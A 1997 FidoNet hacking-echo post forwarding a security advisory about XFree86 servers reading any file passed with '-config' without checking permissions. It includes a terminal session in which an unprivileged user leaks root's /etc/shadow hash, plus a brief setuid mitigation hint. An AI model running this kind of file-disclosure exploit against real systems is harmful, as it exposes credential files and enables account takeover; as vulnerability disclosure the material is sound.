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XFree spy

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_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
 From : Ricky Lyte                          2:5030/48.58    28 Nov 97  15:41:02 
 Subj : XFree spy                                                               
А как насчет чтения файлов, к котоpым нет достyпа? Вот и подсказка!

                  plaguez security advisory n.10

                        XFree86 insecurity

Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
           Other versions as well.

OS:        All

Impact:    The XFree86 servers let you specify an alternate configuration
           file and do not check whether you have rights to read it.
           Any user can read files with root permissions.

just a short one to tell you about this "feature" I found in all default
XFree86 servers...

Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
-auth file             select authorization file
bc                     enable bug compatibility
-bs                    disable any backing store support
-c                     turns off key-click

... and so on.  HINT: look at the first XF86_SVGA output line.


If you run xdm, you should consider removing the setuid bit of the

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.


[email protected]


                                            Team Porno-Grafica

--- 1984!
 * Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)


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